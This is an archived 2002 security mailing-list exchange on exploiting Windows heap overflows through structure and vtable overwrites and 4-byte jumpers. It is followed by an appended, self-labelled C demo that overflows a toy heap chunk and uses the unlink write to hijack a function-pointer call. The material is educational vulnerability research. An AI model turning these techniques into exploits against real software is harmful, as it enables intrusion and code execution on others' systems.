Dave wrote:

> e.g.
> call dword ptr [ecx + 14H]
>
> It's important to remember that heap overflows aren't just about
> overflowing character arrays that have been malloc()ed.

Yup, that's true. Playing with different sizes and different hex codes to overflow can land you in many different spots, such as:

call [ecx + ??]
mov [ecx],[eax]
movsb
cmp al,?? -> mov something

The main point I was trying to press is that we can use the routines to write our egg into a known writable address. Albeit a tricky and time-consuming way, so the trick is to write a small jumper to known memory and call the jumper. The jumper can then locate our main shell code and run it. With the 4 bytes you are limited to something like [reg +/- 80] or so... But you can do stuff like add esp,?? ret, or prepend our jumper to known fixed hex codes so that we can leave a byte or two out, giving us 6 bytes.

From the recent CFMX6 overflow: the exploit lands on the normal mov [ecx],eax, carries on, checks a byte to see if there is more, and then uses another byte to calculate the offset to where the next structure is. Even if only one chunk structure has been overwritten, we now have control of where the routine will look for the next structure. Massive amounts of repeated code allow for a good chance to hit the spot.

Brett

> -----Original Message-----
> From: David Litchfield [mailto:davidat_private]
> Sent: Monday, 2 December 2002 22:29
> To: pen-testat_private; vuln-devat_private
> Subject: Re: Windows Heap Overflows In General
>
> > *) Remember with heap based overflows you can write multiple sets of 4
> > bytes. It's not the registers you are overflowing, but a structure. What
> > do the other structure bytes control? Size does matter!
> > http://archives.neohapsis.com/archives/vulnwatch/2002-q2/0105.html
> > * Where's our code at? It's not just esp that holds important variable
> > locations. Where do all those other numbers point?
>
> In the case of overflowing the data section of one object into the vtable of
> another object you'll be overwriting function pointers, and when one is
> called you can redirect program control.
>
> e.g.
> call dword ptr [ecx + 14H]
>
> It's important to remember that heap overflows aren't just about
> overflowing character arrays that have been malloc()ed.
>
> Cheers,
> David Litchfield
> http://www.ngssoftware.com/
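The structure overwrite Brett and David are discussing, reduced to a toy that runs on a normal machine. This is an added example and not code from either message: the chunk layout, the `target` object, `fake_vtable`, `USER_SIZE` and the handler functions are all assumptions, and the real Windows heap (RtlHeap free lists, lookasides, tags) is laid out differently. What it keeps is the mechanism: an overflow out of one chunk's user data rewrites the *next* chunk's header, and when the allocator later unlinks that chunk its two link writes become "write this 4 (or 8) bytes here" with attacker-chosen operands. The chosen target is an object's vtable pointer, so the next indexed call through it (the thread's `call dword ptr [ecx + 14H]`, index 5 on 32-bit) lands in a table the attacker controls.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

#define USER_SIZE 32   /* user bytes in each toy chunk (assumption) */

/* Toy chunk header: a size word followed by doubly linked free-list links.
   Real heap layouts differ; this is only enough to show what overwriting
   the structure behind a buffer buys you. */
typedef struct chunk {
    size_t        size;   /* user bytes that follow this header */
    struct chunk *flink;  /* only meaningful while the chunk is free */
    struct chunk *blink;
} chunk_t;

static unsigned char *user_data(chunk_t *c) { return (unsigned char *)c + sizeof *c; }
static chunk_t *next_chunk(chunk_t *c) { return (chunk_t *)(user_data(c) + c->size); }

/* The unlink a heap performs when it takes a free chunk off its list.  With
   attacker-chosen links it is the classic pair of writes:
     *(blink + offsetof flink) = flink   and   *(flink + offsetof blink) = blink
   memcpy is used so the demo does not rely on type punning the targets. */
static void unlink_chunk(chunk_t *c)
{
    chunk_t *f = c->flink, *b = c->blink;
    memcpy((unsigned char *)b + offsetof(chunk_t, flink), &f, sizeof f);
    memcpy((unsigned char *)f + offsetof(chunk_t, blink), &b, sizeof b);
}

/* Victim: an object whose first word is a vtable pointer, dispatched by index. */
typedef void (*handler_fn)(void);
typedef struct object { handler_fn *vtable; int id; } object_t;

/* One word of padding before the object so the write to
   "blink + offsetof(flink)" lands exactly on obj.vtable (checked at run time). */
struct target_s { size_t pad; object_t obj; };

static int last_called;
static void legit_handler(void)    { last_called = 1; }
static void hijacked_handler(void) { last_called = 2; }

static handler_fn real_vtable[4] = { legit_handler, legit_handler,
                                     legit_handler, legit_handler };
/* Attacker-controlled table at a known writable address (the "jumper").  The
   reciprocal unlink write clobbers the slot at offsetof(chunk_t, blink), which
   is fake_vtable[2] on both 32- and 64-bit, so that slot is simply never used:
   the "leave a byte or two out" trick from the thread. */
static handler_fn fake_vtable[4];
static struct target_s target;

static union { unsigned char bytes[256]; chunk_t align; } heap_u;  /* toy heap */
static chunk_t free_head;                                          /* list sentinel */

/* Chunk A in use, chunk B immediately after it and on the free list. */
static chunk_t *setup_heap(void)
{
    memset(heap_u.bytes, 0, sizeof heap_u.bytes);
    chunk_t *a = (chunk_t *)heap_u.bytes;
    a->size = USER_SIZE;
    chunk_t *b = next_chunk(a);
    b->size = USER_SIZE;
    b->flink = b->blink = &free_head;
    free_head.flink = free_head.blink = b;
    return a;
}

/* Returns 10*handler-before + handler-after; 12 means control was redirected. */
int run_demo(void)
{
    if (offsetof(struct target_s, obj) != offsetof(chunk_t, flink)) return -1;

    chunk_t *a = setup_heap();
    chunk_t *b = next_chunk(a);

    target.obj.vtable = real_vtable;
    target.obj.vtable[0]();                 /* legit dispatch */
    int before = last_called;

    for (int i = 0; i < 4; i++) fake_vtable[i] = hijacked_handler;

    /* Overflow payload: filler up to A's boundary, then a replacement header
       for B.  size stays sane; flink/blink are the write operands. */
    unsigned char payload[USER_SIZE + sizeof(chunk_t)];
    size_t   keep  = b->size;
    chunk_t *flink = (chunk_t *)fake_vtable;   /* value to plant in the vtable slot */
    chunk_t *blink = (chunk_t *)&target;       /* where it gets planted */
    memset(payload, 'A', USER_SIZE);
    memcpy(payload + USER_SIZE + offsetof(chunk_t, size),  &keep,  sizeof keep);
    memcpy(payload + USER_SIZE + offsetof(chunk_t, flink), &flink, sizeof flink);
    memcpy(payload + USER_SIZE + offsetof(chunk_t, blink), &blink, sizeof blink);

    /* The bug: an unchecked copy of more than USER_SIZE bytes into A. */
    memcpy(user_data(a), payload, sizeof payload);

    /* The next allocation takes B off the free list and performs the writes. */
    unlink_chunk(b);

    target.obj.vtable[0]();                 /* now dispatches through fake_vtable */
    return before * 10 + last_called;
}

int main(void)
{
    printf("result %d (12 = control redirected)\n", run_demo());
    return 0;
}
```

Two points carry over to a real target. The write is a pair, not a single store: whatever address you plant as the "value" also receives the other operand a few bytes in, which is why the thread talks about jumpers that sit in writable memory and tolerate a clobbered word rather than pointing the slot straight at read-only code. And nothing here depended on the overflowed buffer being a character array; it only mattered that a heap structure sat directly behind it and that some routine later walked that structure.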
This archive was generated by hypermail 2b30 : Mon Dec 02 2002 - 16:22:53 PST